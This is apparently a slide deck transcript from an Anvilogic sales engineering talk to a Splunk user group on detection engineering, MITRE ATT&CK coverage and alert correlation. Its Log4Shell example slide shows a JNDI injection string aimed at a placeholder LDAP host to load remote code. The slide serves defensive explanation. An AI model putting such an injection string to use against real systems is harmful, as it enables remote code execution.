Andrew D'Auria, the Director of Sales Engineering at Anvilogic, gave a presentation on modernizing threat detection engineering. He discussed problems with the current detection engineering process, including that it is slow, results in noisy alerts, and lacks coordination across tools. D'Auria proposed using Anvilogic's platform to build detections based on MITRE ATT&CK techniques and scenarios, correlate events of interest without code, and measure detection program effectiveness to improve security operations. He provided examples of how Anvilogic helped a financial client improve detections and reduce alerts.

1. ANVILOGIC Inc. C O N F I D E N T I A L
Modernizing Threat Detection Engineering
San Francisco Bay Area Splunk User Group
Virtual Meeting, October 5, 2022

2. ANVILOGIC Inc. C O N F I D E N T I A L 2
Andrew D’Auria - whoami?
● Director of Sales Engineering at Anvilogic
● Software industry since 1996
● CISSP since 2015
● Splunk, McAfee, Surfcontrol, NetForensics, RSA, and others
● Managing, coaching, and hiring Sales Engineers since 2018
● Native of NYC, living in Wake Forest, NC (Raleigh) since 2007
● Married to Ilissa for 24 years, with 2 daughters Jessica (17)
and Julie (14)
● Will play anything with frets, but especially electric guitar
since 1988
● Love to hike, grill, eat, drink, smoke a pipe/cigar, draw, paint

3. ANVILOGIC Inc. C O N F I D E N T I A L
Data Science Insights & Models
Core Security Operations Functions
3
Cloud Only
Detection Eng. Mature/Maintain
Accelerated Detection Insights, Improve
Purple Team / Threat Research
Hunt
Become Proactive
Triage
Smarter, Faster Analysis
Respond
Automate Response

4. ANVILOGIC Inc. C O N F I D E N T I A L 4
Detection Engineering - The Current Way
1. Manual Research
(ex. Google, Github)
Identify Threat Research 48 hr
2. Track / Feedback
(ex. JIRA)
Create Ticket 1 hr
3. Develop, Test, Deploy
(ex. SIEM)
Build Test
4. Document Use Case
(ex. Confluence)
Runbook 3 hr
Deploy 20 hr
5. Metrics & Reporting
(ex. Qlikview)
Maintain/Tune KPIs
Disjoint
People,
Process,
Technology
Start
End
3-5
Days Each
2-3+
Teams
5+
Tools
x 3
Times
=
+15D
Log4Shell Attack (3 Use
Cases (exploit, .exe, C2)

5. ANVILOGIC Inc. C O N F I D E N T I A L 5
1
Detection engineering is
● slow
● difficult
● results in noisy false
positives delivered to
the SOC
2 3
Bringing all data into a
centralized SIEM data
store is
● expensive
● difficult
especially in hybrid
cloud environments
There is no good way to
● track MITRE ATT&CK
technique coverage
● measure maturity
progress in real time
● identify gaps and
measure risk
What are the problems with detection engineering today?

6. ANVILOGIC Inc. C O N F I D E N T I A L
How can we measure the effectiveness of our DE program?
6
Collection
Detection
Response
• Data Coverage
• Data Quality
• Data Availability
• Detection Coverage
• Detection Quality
• Lifecycle Management
• Alert Management
• Workflow
• Speed
• Accuracy
Strategic Maturity
How Are We Performing?
How Can We Perform Better?
Where Can We Perform Better?
Organizational Risk?
Industry-Specific Risk?
Technology-Specific Risk?
Communicating Value?
Operational Maturity

7. ANVILOGIC Inc. C O N F I D E N T I A L
Typical vs. Ideal Detection → Pyramid of Pain
Typical
• IOC Driven
• Very time limited
• Lack of Context
• Whack-a-mole
Image Source: David Bianco’s blog - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
Ideal
• Tool & Behavior
Driven
• Very hard for
adversaries to change
• Long term strategic
value for detections

8. ANVILOGIC Inc. C O N F I D E N T I A L
Content 2.0
8
Events
Events of
Interest
Alerts
Traditional
Alerts
Threat Scenarios
Risk Thresholds

9. ANVILOGIC Inc. C O N F I D E N T I A L
Threat Identifiers and Threat Scenarios
9
Threat Scenario
Entity ‘X' Entity ‘X' Entity ‘X'
+ +
Threat Identifier
Event ID = “1234”
AND
(Process Name = “XYZ”
OR
Process Name = “ABC”)
Events of Interest
Event of Interest “A”
AND (60 Minutes)
Event of Interest “B”
AND (5 hours)
Event of Interest “C”

10. ANVILOGIC Inc. C O N F I D E N T I A L
Hunting Index - AKA: Events of Interest
● Correlating TTPs or Events of Interest

11. ANVILOGIC Inc. C O N F I D E N T I A L
Modern Security Operations
11
Hunt &
Correlate
Tag, Normalize,
Enrich
Case/Ticketing
& SOAR
Detection Engineering, Alerting, Triage, Hunting, and Response
Across Modern Hybrid Data Environments
Analyst Activity
Triage Threat
Scenarios
Auto-Threat
Detection
No Code -
Build Rules
Detection
Recommendations
Security & IT Products
(ex. EDR, AV, Cloud)
Logs
Logging Platforms
(ex. Splunk, Snowflake, Azure)
Query & Import
API
Query
API
Pull
API Store
Identifiers
(EOIs)

12. Demo...

13. ANVILOGIC Inc. C O N F I D E N T I A L 13
Example: Log4Shell Attack Pattern
Attacker Victim Security Operations Center Response
{$jndi:ldap://1.2.3.4/Exploit}
1
2
java.exe <Payload Class>
3
Establish C2
Detection
Engineers
Research, Test,
Document, Deploy
Alert 3
1000s alerts Alert 1
Alert 2
SOC
Triage
3-5
Days
Build MITRE Attack Detections
1 2 3
+ +
Easy Correlation -
No Code Required!
Initial Access Execution C2
Workspace
& Tasks
Track
Tune,
Versions
Test,
Deploy
Improve,
Mature
Maintain
Research
Exploit in Lab
Develop, Test,
Share
Threat Research
Reduce Alert Volume,
Improve Dwell Time
Attack Scenario
1 2 3
+ +
Triage
Under
2
Hours
Anvilogic Platform for Threat Detection, Investigation, and Response (TDIR)

14. ANVILOGIC Inc. C O N F I D E N T I A L
1
4
Example: Ransomware Attack Pattern
Start
Windows Macro
Execution
An employee opens a
malicious attachment
that runs a macro
Stage 1: Initial Access
1
Cobalt Strike
Abnormal Web
Connection
Machine makes abnormal
web connection to malware
payload domain and
establishes persistence
+60m
3
Stage 3: Command & Control
Stage 2: Installation
Encoded PowerShell
Command
Macro spawns an
encoded command in
powershell
+30s
2
Word Doc
Last Chance
to Detect!
Stage 4: Discovery
AD Find
Execution
Attacker uses adfind to
gather active directory
information for internal
reconnaissance
+60m
Batch File
</>
4
4 Rules 1 Correlation How Long?
+ =
+

15. ANVILOGIC Inc. C O N F I D E N T I A L 15
Anvilogic Impacts - 50B Financial Services
+180
EDR RULES
111
CLOUD
97
ENDPOINT
31
WEB
+403
CUSTOM
55
Azure Rules
Improved by +31%
20
AWS Rules
Improved by +75%
12
GCP Rules
Improved by +17%
24
O365 Rules
Improved by +21%
12
Proxy Rules
Improved by +30%
19
Web App Rules
Improved by +40%
55
Windows Rules
Improved by +55%
42
Linux Rules
Improved by +90%
180
EDR Rules
Linux & Windows
51
SCENARIOS
239
IDENTIFIERS
17
MACROS
8.14M
Warnings
300+
Identifiers
351
Alerts
10+
Scenarios
8.1T
Raw Events
4,000+
Sourcetypes
USE CASES
454
DEPLOYED
5.8
Alerts per day
UPLOADS
DOWNLOADS
~2m
● Increased Overall Detections by 91%
● Saved up to 6,500+ hours of engineering time
Anvilogic Framework Impacts
(60 Days)

16. ANVILOGIC Inc. C O N F I D E N T I A L
Key Takeaways
& Next Steps
● Effective detection engineering requires good
data, process, and measurement
● Not every detection requires an alert or action
● Build effective detections based on real-world
attack scenarios and risk thresholds
● Pyramid of pain whitepaper
https://www.anvilogic.com/learn/whitepaper-
pyramid-apex
● Subscribe to our Threat Report
anvilogic.com/resources/threat-report

17. Thank You!
adauria@anvilogic.com
anvilogic.com/resources/threat-report
https://www.anvilogic.com/learn/whitepaper-pyramid-apex